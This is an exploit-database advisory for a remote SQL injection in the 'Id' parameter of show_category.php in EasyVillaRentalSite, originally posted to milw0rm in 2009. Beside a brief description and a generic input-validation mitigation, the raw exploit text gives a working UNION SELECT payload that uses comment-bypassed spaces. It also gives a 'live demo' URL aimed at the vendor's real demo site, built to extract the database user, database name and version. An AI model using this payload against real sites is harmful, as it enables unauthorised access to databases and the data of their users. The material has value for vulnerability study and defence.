EasyVillaRentalSite (id) Remote SQL Injection Vulnerability

vendor:

EasyVillaRentalSite

by:

BazOka-HaCkEr

CVSS

HIGH

SQL Injection

CWE

Product Name: EasyVillaRentalSite

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

EasyVillaRentalSite (id) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in EasyVillaRentalSite. An attacker can exploit this vulnerability to gain access to sensitive information such as user credentials, database name, and version. This is achieved by sending a specially crafted HTTP request to the vulnerable application containing malicious SQL statements in the 'Id' parameter of the 'show_category.php' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.

Source

Exploit-DB raw data:

========================================================

==> EasyVillaRentalSite (id) Remote SQL Injection Vulnerability

========================================================

==> AuThOr : BazOka-HaCkEr

==> EmaiL    : wuo@hotmail.com

==> HomE    :  www.TrYaG.cc/cc

========================================================

==> Product Page :

==> http://easyvillarentalsite.com

==> ExplO!te :

==> show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--
 
==> L!ve D3mo :

==> http://easyvillarentalsite.com/demo/show_category.php?Id=-2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),0x3a,database(),0x3a,version())--

=========================================================

==> GreeTz :

==> FeezO , Abu-Mahdi , MoGaTiL , Str0ke , TrYaG TeaM

=========================================================

# milw0rm.com [2009-07-09]